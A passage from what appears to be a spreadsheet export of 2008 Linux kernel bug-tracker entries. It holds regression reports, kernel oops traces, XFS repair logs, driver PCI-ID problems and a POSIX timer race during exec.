observable by the caller. The next gettimeofday call on CPU1 will show the correct time again as now the TSC has advanced above the reference value. To prevent this TSC specific wreckage we need to compare the TSC value against the reference value and return the latter when it is larger than the actual TSC value. I pondered to mark the TSC unstable when the readout is smaller than the reference value, but this would render an otherwise good and fast clocksource unusable without a real good reason. Signed-off-by: Thomas Gleixner &lt;tglx@linutronix.de&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt;</t>
  </si>
  <si>
    <t>[PATCH] scsi: fix sense_slab/bio swapping livelock</t>
  </si>
  <si>
    <t>2008-04-07 02:15 UTC</t>
  </si>
  <si>
    <t>2008-04-07 09:01 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] scsi: fix sense_slab/bio swapping livelock Submitter : Hugh Dickins &lt;hugh@veritas.com&gt; Date : 2008-04-06 23:56 References : http://lkml.org/lkml/2008/4/6/99 Handled-By : James Bottomley &lt;James.Bottomley@hansenpartnership.com&gt; Patch : http://lkml.org/lkml/2008/4/6/99 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Compilation broken by commit 92c9d07507f0a90b64172bfede7e6fa845e8e66b</t>
  </si>
  <si>
    <t>pvrusb</t>
  </si>
  <si>
    <t>commit 92c9d07507f0a90b64172bfede7e6fa845e8e66b</t>
  </si>
  <si>
    <t>2008-04-07 04:35 UTC</t>
  </si>
  <si>
    <t>2008-04-07 20:45 UTC</t>
  </si>
  <si>
    <t>Submitter : Soeren Sonnenburg &lt;kernel@nn7.de&gt; Date : 2008-04-07 04:20 References : http://bugzilla.kernel.org/show_bug.cgi?id=10319#c14 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops in drivers/acpi/bus.c::acpi_bus_receive_event()</t>
  </si>
  <si>
    <t>2008-04-07 12:00 UTC</t>
  </si>
  <si>
    <t>2008-10-16 22:40 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Unknown Earliest failing kernel version: 2.6.25-rc6-git12 Distribution: Fedora Hardware Environment: x86_64 Bad page state in process 'hald-addon-acpi' page:ffffe200000227a0 flags:0x0000000000000400 mapping:0000000000000000 mapcount:0 count:0 (Not tainted) Trying to fix it up, but a reboot is needed Backtrace: Pid: 2742, comm: hald-addon-acpi Not tainted 2.6.24-0.136.rc6.git12.fc9 #1 Call Trace: [&lt;ffffffff81054731&gt;] lock_release_holdtime+0x27/0x49 [&lt;ffffffff8107fa96&gt;] bad_page+0x70/0x9c [&lt;ffffffff810565ce&gt;] trace_hardirqs_on+0x107/0x12a [&lt;ffffffff81080858&gt;] free_hot_cold_page+0x91/0x191 [&lt;ffffffff8116b5aa&gt;] acpi_bus_receive_event+0xf5/0x11b [&lt;ffffffff81030003&gt;] default_wake_function+0x0/0xe [&lt;ffffffff81176255&gt;] acpi_system_read_event+0x53/0xe6 [&lt;ffffffff81176202&gt;] acpi_system_read_event+0x0/0xe6 [&lt;ffffffff81176202&gt;] acpi_system_read_event+0x0/0xe6 [&lt;ffffffff810decba&gt;] proc_reg_read+0x80/0x9a [&lt;ffffffff810a64df&gt;] vfs_read+0xc3/0x16b [&lt;ffffffff810a68c2&gt;] sys_read+0x45/0x6e [&lt;ffffffff8100c07a&gt;] tracesys+0xdc/0xe1 Unable to handle kernel paging request at 0000000000100108 RIP: [&lt;ffffffff8112e38c&gt;] list_del+0x4/0x5b PGD 6f009067 PUD 6f008067 PMD 0 Oops: 0000 [1] SMP CPU 1 Modules linked in: ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 xt_state nf_conntrack ipt_REJECT xt_tcpudp iptable_filter ip_tables x_tables bridge nfsd lockd nfs_acl auth_rpcgss exportfs autofs4 sunrpc cpufreq_ondemand acpi_cpufreq dm_mirror dm_multipath dm_mod ipv6 uinput snd_hda_intel snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq arc4 snd_seq_device snd_pcm_oss ecb blkcipher mmc_block snd_mixer_oss snd_pcm snd_timer thinkpad_acpi snd_page_alloc hwmon snd_hwdep iwl3945 sdhci pcspkr mmc_core firewire_ohci firewire_core joydev i2c_i801 i2c_core rtc_cmos snd mac80211 i915 iTCO_wdt crc_itu_t iTCO_vendor_support ricoh_mmc drm hci_usb cfg80211 e1000 soundcore bluetooth sr_mod battery ac power_supply video cdrom output sg button ata_piix ahci libata sd_mod scsi_mod ext3 jbd mbcache uhci_hcd ohci_hcd ehci_hcd Pid: 2742, comm: hald-addon-acpi Tainted: G B 2.6.24-0.136.rc6.git12.fc9 #1 RIP: 0010:[&lt;ffffffff8112e38c&gt;] [&lt;ffffffff8112e38c&gt;] list_del+0x4/0x5b RSP: 0018:ffff81006f001e08 EFLAGS: 00010092 RAX: 0000000000000207 RBX: 0000000000100100 RCX: 0000000000000000 RDX: 0000000000000001 RSI: 0000000000000000 RDI: 0000000000100100 RBP: 0000000000000207 R08: 0000000000000002 R09: 0000000000000001 R10: ffffffff8116b56e R11: ffffffff810ff1ab R12: ffff81006f001e68 R13: 00002aaaaaaca000 R14: ffff81006f001f50 R15: 0000000000000400 FS: 00002aaaab028aa0(0000) GS:ffff81007e001578(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000000000100108 CR3: 000000006ffc1000 CR4: 00000000000006a0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process hald-addon-acpi (pid: 2742, threadinfo ffff81006f000000, task ffff81006fc5c000) Stack: ffff81006f001e68 ffffffff8116b585 0000000000000000 ffff81006fc5c000 ffffffff81030003 0000000000000000 0000000000000000 0000000000000002 fffffffffffffffb 0000000000000400 ffff81006f001f50 ffffffff81176255 Call Trace: [&lt;ffffffff8116b585&gt;] acpi_bus_receive_event+0xd0/0x11b [&lt;ffffffff81030003&gt;] default_wake_function+0x0/0xe [&lt;ffffffff81176255&gt;] acpi_system_read_event+0x53/0xe6 [&lt;ffffffff81176202&gt;] acpi_system_read_event+0x0/0xe6 [&lt;ffffffff81176202&gt;] acpi_system_read_event+0x0/0xe6 [&lt;ffffffff810decba&gt;] proc_reg_read+0x80/0x9a [&lt;ffffffff810a64df&gt;] vfs_read+0xc3/0x16b [&lt;ffffffff810a68c2&gt;] sys_read+0x45/0x6e [&lt;ffffffff8100c07a&gt;] tracesys+0xdc/0xe1 Code: 48 8b 4f 08 48 89 fe 48 8b 11 48 39 fa 74 12 48 c7 c7 9e 3a RIP [&lt;ffffffff8112e38c&gt;] list_del+0x4/0x5b RSP &lt;ffff81006f001e08&gt; CR2: 0000000000100108 ---[ end trace a50a3e92dc434630 ]---</t>
  </si>
  <si>
    <t>Filesystem failing without any warning or etc</t>
  </si>
  <si>
    <t>2.6.25-rc8-git1</t>
  </si>
  <si>
    <t>2008-04-07 23:11 UTC</t>
  </si>
  <si>
    <t>2008-05-28 13:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.3 Earliest failing kernel version: 2.6.25-rc7-git3 Distribution: Custom Hardware Environment: Sun Fire X4100 Software Environment: Customer distro with busybox tools, mount-2.12r Problem Description: Each night my proxy is crashing. I notice that it's cannot open some cache directory. Before it was /cache4, but after i remove it from configuration of squid and even unmounted it, /cache3 start to fail. All hardware is in good condition, and i have similar problem on another proxy server, but it's more rare (not each night). After analysing situation here is result: ls /cache3 is empty, while it must be one directory, squid. SUPERPROXY /cache3 # echo "xxx" &gt;x -ash: cannot create x: Input/output error /dev/sde1 on /cache3 type xfs (rw,noatime,nodiratime,logbufs=8,noquota) SUPERPROXY /cache3 # xfs_info /cache3 xfs_info: /cache3 is not a mounted XFS filesystem SUPERPROXY /cache3 # cat /proc/mounts rootfs / rootfs rw 0 0 proc /proc proc rw 0 0 sysfs /sys sysfs rw 0 0 none /dev/pts devpts rw,mode=600 0 0 none /proc/bus/usb usbfs rw 0 0 /dev/mapper/root /mnt/flash ext3 rw,noatime,errors=continue,data=ordered 0 0 /dev/sdc2 /cache1 xfs rw,noatime,nodiratime,logbufs=8,noquota 0 0 /dev/sdd1 /cache2 xfs rw,noatime,nodiratime,logbufs=8,noquota 0 0 /dev/sde1 /cache3 xfs rw,noatime,nodiratime,logbufs=8,noquota 0 0 SUPERPROXY ~ # umount /cache3 on dmesg appeared: [261943.707659] xfs_force_shutdown(sde1,0x1) called from line 420 of file fs/xfs/xfs_rw.c. Return address = 0xf8b79dd2 SUPERPROXY ~ # xfs_repair /dev/sde1 Phase 1 - find and verify superblock... Phase 2 - using internal log - zero log... - scan filesystem freespace and inode maps... - found root inode chunk Phase 3 - for each AG... - scan and clear agi unlinked lists... - process known inodes and perform inode discovery... - agno = 0 - agno = 1 - agno = 2 - agno = 3 - agno = 4 - agno = 5 - agno = 6 - agno = 7 - agno = 8 - agno = 9 - agno = 10 - agno = 11 - agno = 12 - agno = 13 - agno = 14 - agno = 15 - process newly discovered inodes... Phase 4 - check for duplicate blocks... - setting up duplicate extent list... - check for inodes claiming duplicate blocks... - agno = 0 - agno = 1 - agno = 2 - agno = 3 - agno = 4 - agno = 5 - agno = 6 - agno = 7 - agno = 8 - agno = 9 - agno = 10 - agno = 11 - agno = 12 - agno = 13 - agno = 14 - agno = 15 Phase 5 - rebuild AG headers and trees... - reset superblock... Phase 6 - check inode connectivity... - resetting contents of realtime bitmap and summary inodes - traversing filesystem ... - traversal finished ... - moving disconnected inodes to lost+found ... disconnected inode 471077370, moving to lost+found Phase 7 - verify and correct link counts... done SUPERPROXY /cache3/lost+found # ls -la drwxr-xr-x 2 root root 38 Apr 3 08:49 . drwxr-xr-x 4 squid root 35 Apr 6 2007 .. -rw-r----- 1 squid squid 0 Apr 1 00:38 336079762 -rw-r----- 1 squid squid 0 Mar 19 07:11 471077370 Steps to reproduce: Difficult, i didn't found any reason why it is crashing.</t>
  </si>
  <si>
    <t>sata_svw: only 4 ports of 8-port board RAIDCore BCM4852 work. (PCI-ID collision?)</t>
  </si>
  <si>
    <t>2008-04-08 07:17 UTC</t>
  </si>
  <si>
    <t>Yohei Honda</t>
  </si>
  <si>
    <t>2012-05-18 10:30 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: None Earliest failing kernel version: 2.6.18 (or earlier) Distribution: Gentoo Hardware Environment: TYAN S3992 + Broadcom RAIDCore BCM4852 Software Environment: Problem Description: I am using 8-ports SATA-RAID board Broadcom RAIDCore BCM4852, whose PCI-ID is 1166:0241. While, PCI-ID 1166:0241 is defined as Serverworks Frodo4 which has 4 ports in sata_svw.c. driver/ata/sata_svw.c:479 - 493 (linux-2.6.24.4): /* 0x240 is device ID for Apple K2 device * 0x241 is device ID for Serverworks Frodo4 * 0x242 is device ID for Serverworks Frodo8 * 0x24a is device ID for BCM5785 (aka HT1000) HT southbridge integrated SATA * controller * */ static const struct pci_device_id k2_sata_pci_tbl[] = { { PCI_VDEVICE(SERVERWORKS, 0x0240), board_svw4 }, { PCI_VDEVICE(SERVERWORKS, 0x0241), board_svw4 }, /* &lt;-- defined as 4-ports board */ { PCI_VDEVICE(SERVERWORKS, 0x0242), board_svw8 }, { PCI_VDEVICE(SERVERWORKS, 0x024a), board_svw4 }, { PCI_VDEVICE(SERVERWORKS, 0x024b), board_svw4 }, { } }; Thus, only 4 ports out of 8 ports work without rewriting the definition. (rewriting "board_svw4" to "board_svw8" makes the board working all 8 ports.) I don't know about Frodo4, but I afraid of PCI-ID collision. If so, I think that it needs a module parameter to specify the number of ports of these devices. Steps to reproduce:</t>
  </si>
  <si>
    <t>Problem with pata_marvell kernel module : kernel 2.6.24.4 in Mandriva 2008.1 RC2 don't detect my IDE harddisk connected to a Marvell 88SE6111 IDE Controller</t>
  </si>
  <si>
    <t>kernel 2.6.24.4</t>
  </si>
  <si>
    <t>2008-04-08 08:53 UTC</t>
  </si>
  <si>
    <t>Yannick56</t>
  </si>
  <si>
    <t>Latest working kernel version: kernel 2.6.24.4 ++++ Distribution: Mandriva 2008.1 RC2 ++++++ Hardware Environment: I have a MSI P35 NEO Combo mainboard with an Intel Core 2 duo CPU (E4600) and Nvidia 8600GT graphic card. (http://global.msi.com.tw/index.php?func=proddesc&amp;prod_no=1216&amp;maincat_no=1&amp;cat2_no=170) This mainboard have these chipsets: • Intel® P35 Chipset - Supports FSB 800/1066/1333MHz. • Intel® ICH9 Chipset - Hi-Speed USB (USB2.0) controller, 480Mb/sec, up to 12 ports. - 4 SATAII ports (ICH9) with transfer rate up to 3Gb/s. - PCI Master v2.3, I/O APIC. - ACPI 2.0 compliant. On-Board IDE/SATA • One Ultra DMA 66/100/133 IDE controller integrated in Marvell® 88SE6111. - Supports PIO, Bus Master operation modes. - Can connect up to two Ultra ATA drives. • SATAII controller integrated in ICH9 and Marvell® 88SE6111 chipset - Up to 3Gb/s transfer speed. - Supports four SATAII ports by ICH9. - Supports one SATAII port by 88SE6111. Harddisk : IDE Hitachi Deskstar 7K80 80 Go 2 Mo (HDS728080PLAT20) DVD-ROM Reader/Writer : LG GSA-H22N +++++ Problem Description: My main harddisk where I want to create my root(/) and home (/home) partitions is an IDE Hitachi Deskstar 7K80 80 Go 2 Mo (HDS728080PLAT20) harddisk that is connected to an IDE controller integrated in Marvell 88SE6111 chipset. My LG GSA-H22N DVD-Rom reader is connected to the same IDE connector than my IDE harddisk. I use this DVD-Rom reader for installing Mandriva 2008.1 RC2. I have an other Hitachi harddisk that is connected to an SATAII port by ICH9 chipset. When I want to create my root linux partition, the mandriva installer show me only one harddisk that is connected to sata port. The installer don't show my main harddisk that is connnected to ide port with Marvell chipset. Because I unplug my sata harddisk, the mandriva installer said me that it don't find any harddisk on my PC computer. It propose to show me the harddisk controller informations avaible on my computer : The mandriva 2008.1 RC2 installer found these harddisk chipset on my computer : pata_marvell : "Marvell Technology Group Ltd. | 88SE6121 SATA II Controller" [Storage_IDE] ata_piix : "Intel corporation (82801 | (ICH9 Family ) 2 port SATA IDE Controller [storage_ide] (subv: 1462 subd : 7365) ata_piix : "Intel corporation (82801 | (ICH9 Family ) 2 port SATA IDE Controller [storage_ide] (subv: 1462 subd : 7365) ata_piix : "Intel corporation (82801 | B (ICH9 Family ) 2 port SATA IDE Controller [storage_ide] (subv: 1462 subd : 7365) ata_piix : "Intel corporation (82801 | B (ICH9 Family ) 2 port SATA IDE Controller [storage_ide] (subv: 1462 subd : 7365) Version-Release number of selected component (if applicable): Installer in MandrivaLinux 2008.1 RC2 How reproducible: use an IDE harddisk connected to an IDE port with IDE 88SE6111 chipset on a motherboard and a ICH9 chipset too on this same mainboard +++++ VERY IMPORTANT INFORMATION : I think that my IDE harddisk don't work with the latest kernel and Marvell 88SE6111 chipset because there is no support for it in the pata_marvell kernel module. When I browse kernel 2.6.25-rc8 sources by Web Git, I found the file : [linux/kernel/git/torvalds/linux-2.6.git] / drivers / ata / pata_marvell.c source : http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=blob;f=drivers/ata/pata_marvell.c;h=a81f25d872355df8dad4d52b04103bdde9ad640c;hb=6fdf5e67fe8d3c83500dad9acae985132c2459a3 pata_marvell.c is the file for ide support in Marvell Chipset. In this file, there is only support for : Marvell 88SE6101 Marvell 88SE6121 Marvell 88SE6123 Marvell 88SE6145 This is support is with these lines 191 to 197 : static const struct pci_device_id marvell_pci_tbl[] = { 192 { PCI_DEVICE(0x11AB, 0x6101), }, 193 { PCI_DEVICE(0x11AB, 0x6121), }, 194 { PCI_DEVICE(0x11AB, 0x6123), }, 195 { PCI_DEVICE(0x11AB, 0x6145), }, 196 { } /* terminate list */ 197 }; I found too that Alan Cox date [Thu, 23 Aug 2007 19:19:55 +0000 (20:19 +0100)] do : pata_marvell: Add more identifiers modification diff --git a/drivers/ata/pata_marvell.c b/drivers/ata/pata_marvell.c index 87594c0..ae206f3 100644 (file) --- a/drivers/ata/pata_marvell.c +++ b/drivers/ata/pata_marvell.c @@ -192,6 +192,8 @@ static int marvell_init_one (struct pci_dev *pdev, const struct pci_device_id *i static const struct pci_device_id marvell_pci_tbl[] = { { PCI_DEVICE(0x11AB, 0x6101), }, + { PCI_DEVICE(0x11AB, 0x6121), }, + { PCI_DEVICE(0x11AB, 0x6123), }, { PCI_DEVICE(0x11AB, 0x6145), }, { } /* terminate list */ }; source http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=d36ee189f392ea89de85124a0b58477bb0f2e0a6 Can you patch the pata_marvell.c file and replace static const struct pci_device_id marvell_pci_tbl[] = { 192 { PCI_DEVICE(0x11AB, 0x6101), }, 193 { PCI_DEVICE(0x11AB, 0x6121), }, 194 { PCI_DEVICE(0x11AB, 0x6123), }, 195 { PCI_DEVICE(0x11AB, 0x6145), }, 196 { } /* terminate list */ 197 }; by static const struct pci_device_id marvell_pci_tbl[] = { { PCI_DEVICE(0x11AB, 0x6101), }, { PCI_DEVICE(0x11AB, 0x6102), }, { PCI_DEVICE(0x11AB, 0x6111), }, { PCI_DEVICE(0x11AB, 0x6121), }, { PCI_DEVICE(0x11AB, 0x6122), }, { PCI_DEVICE(0x11AB, 0x6123), }, { PCI_DEVICE(0x11AB, 0x6141), }, { PCI_DEVICE(0x11AB, 0x6145), }, { } /* terminate list */ }; ++++ Helpful Information : A lot of information on Marvell 88SE61xx IDE/SATA chipsets http://en.wikipedia.org/wiki/List_of_Marvell_Technology_Group_chipsets#Linux_IDE.28PATA.29_driver My bug report at Mandriva team : https://qa.mandriva.com/show_bug.cgi?id=39842 Thanks in advance. Yannick</t>
  </si>
  <si>
    <t>usb-serial.c doesn't work in 2.6.24 kernels.</t>
  </si>
  <si>
    <t>2008-04-08 13:45 UTC</t>
  </si>
  <si>
    <t>Matthias Egger</t>
  </si>
  <si>
    <t>2008-05-08 10:45 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23.17 Earliest failing kernel version: 2.6.24 Distribution: Gentoo Linux with original sources from Kernel.org Problem Description: It took my a whole day to find out, why my Edgeport/1 did not work with the latest stable Kernel (2.6.24.4). Whenever i attached the device dmesg produced the following messages: ----- usb 2-1: new full speed USB device using uhci_hcd and address 8 usb 2-1: configuration #1 chosen from 1 choice usbcore: registered new interface driver usbserial drivers/usb/serial/usb-serial.c: USB Serial Driver core drivers/usb/serial/usb-serial.c: USB Serial support registered for Edgeport TI 1 port adapter drivers/usb/serial/usb-serial.c: USB Serial support registered for Edgeport TI 2 port adapter io_ti: probe of 2-1:1.0 failed with error -5 ----- I was sure it worked lately, so i downgraded to an older (2.6.22.19) Kernel and voila... there everything worked. ----- usb 2-1: new full speed USB device using uhci_hcd and address 7 usb 2-1: configuration #1 chosen from 1 choice io_ti 2-1:1.0: Edgeport TI 1 port adapter converter detected usb 2-1: Edgeport TI 1 port adapter converter now attached to ttyUSB0 ----- After Downloading some Kernel Versions i found out the following: -&gt; When i try to compile 2.6.24.4 and attach the device i get "error -5". -&gt; when i copy the 2.6.22.19 usb-serial.c over the 2.6.24.4 usb-serial.c file the attached Edgeport/1 is getting recognized and /dev/ttyUSB0 is created. -&gt; when i copy the 2.6.23 usb-serial.c over the 2.6.24.4 usb-serial.c file the attached Edgeport/1 is getting recognized and /dev/ttyUSB0 is created. -&gt; when i copy the 2.6.24 usb-serial.c over the 2.6.24.4 usb-serial.c file the attached Edgeport/1 produces the "error -5" Looks like the changes made between 2.6.23 and 2.6.24 in usb-serial.c prevent io_ti from working correctly. Steps to reproduce: Take Kernel 2.6.24 and choose Device Drivers ---&gt; [*] USB support ---&gt; USB Serial Converter support ---&gt; &lt;M&gt; USB Serial Converter support &lt;M&gt; USB Inside Out Edgeport Serial Driver (TI devices) Attach Edgeport/1 and when the modules are loaded you get: io_ti: probe of 2-1:1.0 failed with error -5 From Kernel 2.6.23.17 copy drivers/usb/serial/usb-serial.ch over the file in the 2.6.24 directory, recompile and the Edgeport/1 Driver loads and creates /dev/ttyUSB0 (and beside that, also works perfectly!).</t>
  </si>
  <si>
    <t>[rc8] Regression: key repeats and skips in music during compilation</t>
  </si>
  <si>
    <t>2008-04-08 15:26 UTC</t>
  </si>
  <si>
    <t>2008-04-14 15:04 UTC</t>
  </si>
  <si>
    <t>Subject : [rc8] Regression: key repeats and skips in music during compilation Submitter : Frans Pop &lt;elendil@planet.nl&gt; Date : 2008-04-04 12:22 References : http://lkml.org/lkml/2008/4/4/83 Handled-By : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2008-10-24 23:25 UTC</t>
  </si>
  <si>
    <t>2.6.25-rc8: FTP transfer errors</t>
  </si>
  <si>
    <t>2008-04-09 13:57 UTC</t>
  </si>
  <si>
    <t>2008-04-13 13:39 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc8: FTP transfer errors Submitter : Mark Lord &lt;lkml@rtr.ca&gt; Date : 2008-04-09 00:56 References : http://lkml.org/lkml/2008/4/9/4 Handled-By : Jeff Garzik &lt;jeff@garzik.org&gt; Handled-By : YOSHIFUJI Hideaki / 吉藤英明 &lt;yoshfuji@linux-ipv6.org&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>alpha build errors with gcc 4.3</t>
  </si>
  <si>
    <t>2008-04-10 11:22 UTC</t>
  </si>
  <si>
    <t>2008-06-22 00:40 UTC</t>
  </si>
  <si>
    <t>The only architecture that has serious problems when trying to build a kernel with gcc 4.3 is alpha (and considering the usage of "extern inline" on this architecture problems with gcc 4.3 are somehow expected). The build fails with: &lt;-- snip --&gt; ... CC arch/alpha/kernel/traps.o cc1: warnings being treated as errors In file included from /home/bunk/linux/kernel-2.6/git/linux-2.6/include/linux/sched.h:64, from /home/bunk/linux/kernel-2.6/git/linux-2.6/arch/alpha/kernel/traps.c:12: include2/asm/semaphore.h: In function 'down': include2/asm/semaphore.h:133: error: '__down' is static but used in inline +function 'down' which is not static ... make[2]: *** [arch/alpha/kernel/traps.o] Error 1 &lt;-- snip --&gt;</t>
  </si>
  <si>
    <t>VLAN: link level multicasts addresses disappears...</t>
  </si>
  <si>
    <t>2.6.23.15</t>
  </si>
  <si>
    <t>2008-04-11 09:18 UTC</t>
  </si>
  <si>
    <t>Dmitry Butskoy</t>
  </si>
  <si>
    <t>2008-04-15 05:32 UTC</t>
  </si>
  <si>
    <t>Each IP interface in the UP state "have" appropriate multicast addresses, which can be shown by "ip maddr show" output. For example, for an ordinary one-card computer, "ip maddr show" shows something like: 1: lo inet 224.0.0.1 2: eth0 link 01:00:5e:00:00:01 inet 224.0.0.1 or something more if IPv6 is enabled. I've discovered an issue with the link layer multicasts (aka 01:00:5e:00:00:01 in the example above) and VLAN devices. When I do some non-trivial vlan manipulations (more than one vlan device, "set up/set down" several times, etc.), "ip maddr show" shows either the wrong "users %d" count for "link" addresses, or the "link" addresses disappears at all. Unfortunately, it seems that there is no any "stable" scheme to catch the issue, but it happens "often enough" in various situations. I've wrote a test script (see below), which perform in a loop some trivial things over vlans and then shows "ip maddr show". (To run the script further just type enter. Ctrl-C to break). I've disabled ipv6 module on the test machine to be more clean. For me, in the first 5 steps I already catched the issue. Instead of the normal situation: 1: lo inet 224.0.0.1 2: eth0 link 01:00:5e:00:00:01 users 3 inet 224.0.0.1 3: eth0.2 link 01:00:5e:00:00:01 users 2 inet 224.0.0.1 4: eth0.3 link 01:00:5e:00:00:01 users 2 inet 224.0.0.1 I often see: 1: lo inet 224.0.0.1 2: eth0 link 01:00:5e:00:00:01 inet 224.0.0.1 3: eth0.2 link 01:00:5e:00:00:01 users 2 inet 224.0.0.1 4: eth0.3 inet 224.0.0.1 or even: 1: lo inet 224.0.0.1 2: eth0 inet 224.0.0.1 3: eth0.2 inet 224.0.0.1 4: eth0.3 inet 224.0.0.1 at all. Sorry that I've tested it on too old kernel (2.6.23), but I hope the test script is convenient enough to check whether the issue still present at the newest kernels or not.</t>
  </si>
  <si>
    <t>mm/slab.c boot crash in -git, "kernel BUG at mm/slab.c:2103!"</t>
  </si>
  <si>
    <t>2008-04-13 10:55 UTC</t>
  </si>
  <si>
    <t>2008-04-16 05:21 UTC</t>
  </si>
  <si>
    <t>Subject : mm/slab.c boot crash in -git, "kernel BUG at mm/slab.c:2103!" Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; Date : 2008-04-11 03:42 References : http://www.ussg.iu.edu/hypermail/linux/kernel/0804.1/1209.html Handled-By : "Pekka Enberg" &lt;penberg@cs.helsinki.fi&gt; Handled-By : Nick Piggin &lt;npiggin@suse.de&gt; Handled-By : Christoph Lameter &lt;clameter@sgi.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>sh64: add missing #include &lt;asm/fpu.h&gt;'s</t>
  </si>
  <si>
    <t>2.6.25-rc9</t>
  </si>
  <si>
    <t>2008-04-13 11:23 UTC</t>
  </si>
  <si>
    <t>2008-04-15 11:30 UTC</t>
  </si>
  <si>
    <t>Subject : sh64: add missing #include &lt;asm/fpu.h&gt;'s Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/4/13/171 Caused-By : Paul Mundt &lt;lethal@linux-sh.org&gt; commit 9bbafce2eec190ef7e44b0eb1095ba17ce6ad3af Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/4/13/171</t>
  </si>
  <si>
    <t>Support for unicode dead keys</t>
  </si>
  <si>
    <t>2008-04-16 02:01 UTC</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #7746 +++ +++ Please see the discussion there for the history +++ Hi, Quoting a mail from Vojtech Pavlik: "Several languages (polish, czech, slovak, ...) use dead keys (keys that don't do anything per s</t>
  </si>
  <si>
    <t>budget_av: High CPU load due to CI slot polling</t>
  </si>
  <si>
    <t>ttpci</t>
  </si>
  <si>
    <t>2008-04-16 11:56 UTC</t>
  </si>
  <si>
    <t>Robert Schedel</t>
  </si>
  <si>
    <t>2008-05-23 13:16 UTC</t>
  </si>
  <si>
    <t>Failing kernel version: 2.6.24.4 Distribution: Gentoo (reproducable with gentoo kernel as well as vanilla kernel 2.6.24.4!) Hardware Environment: Athlon 64X2 3800+, Satelco Easywatch DVB-C (1894:002c), no CI/CAM Software Environment: Linux kernel 2.6.24.4 SMP x86_64, budget_av module Problem Description: After the budget_av driver module is loaded (even without any DVB application), the CPU load average in 'top' rises to ~1, but in top no active tasks are found. After unloading the driver, the load decreases again to ~0. Steps to reproduce: - Precondition: budget_av card (e.g. Satelco EasyWatch DVB-C) without CI inserted in PCI slot - modprobe budget_av - Watch CPU load in top Please note: The high CPU load is not only a statistical issue due to the kernel accounting. It would put at least some unnecessary stress on PCI and CPU and e.g. also has the effect that cron tasks with idle guard condition would not start, so on midterm this should be fixed. Additional information: 1) lspci output: 00:09.0 Multimedia controller: Philips Semiconductors SAA7146 (rev 01) Subsystem: KNC One Unknown device 002c Flags: bus master, medium devsel, latency 64, IRQ 16 Memory at fb500000 (32-bit, non-prefetchable) [size=512] Kernel driver in use: budget_av Kernel modules: budget-av 2) uptime output when issue occurs (load can differ between ~0,7-1): 10:57:32 up 1:14, 1 user, load average: 0.75, 0.45, 0.19 3) kernel information: Linux 2.6.24.4 #1 SMP Fri Apr 11 10:07:01 CEST 2008 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 3800+ AuthenticAMD GNU/Linux 4) Syslog output when loading budget_av module: saa7146: register extension 'budget_av'. ACPI: PCI Interrupt 0000:00:09.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 saa7146: found saa7146 @ mem ffffc2000001e000 (revision 1, irq 16) (0x1894,0x002c). saa7146 (0): dma buffer size 192512 DVB: registering new adapter (Satelco EasyWatch DVB-C MK3) adapter failed MAC signature check encoded MAC from EEPROM was ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff KNC1-0: MAC addr = 00:09:[...] DVB: registering frontend 0 (Philips TDA10023 DVB-C)... budget-av: ci interface initialised. 5) Full lsmod output after budget_av has been loaded: Module Size Used by tda10023 6532 1 budget_av 20736 0 saa7146_vv 49856 1 budget_av videobuf_dma_sg 12676 1 saa7146_vv videobuf_core 17348 2 saa7146_vv,videobuf_dma_sg firmware_class 8768 1 budget_av budget_core 10436 1 budget_av dvb_core 83436 2 budget_av,budget_core saa7146 16904 3 budget_av,saa7146_vv,budget_core ttpci_eeprom 2496 1 budget_core ip6table_filter 2752 1 xt_state 2560 2 powernow_k8 13600 1 Please report when additional information is required.</t>
  </si>
  <si>
    <t>race involving POSIX timers in exec</t>
  </si>
  <si>
    <t>2008-04-16 15:36 UTC</t>
  </si>
  <si>
    <t>2008-04-28 09:38 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sid Hardware Environment: ThinkPad T42 Problem Description: According to POSIX, per-process timers (those created by timer_create) should be "disarmed and deleted" by an exec. While these timers are indeed deleted by the time the new process image runs, it's possible for a signal to arrive _while_ loading the new process image, before the timers have been deleted. The timer signal is, in turn, delivered to the new process, usually killing it. The exact sequence of events is: 1. The initial process creates a realtime per-process timer, set up to deliver a signal when the timer expires. 2. The initial process calls exec(). 3. The per-process timer expires, causing the timer signal to be queued in the pending signals for the process. (kernel/posix-timers.c:posix_timer_event) 4. All of the timers associated with the current process are deleted. (fs/exec.c:flush_old_exec -&gt; fs/exec.c:de_thread -&gt; kernel/posix-timers.c:exit_itimers) 5. Signal handlers are flushed, setting the action for the timer signal to the default, presumably 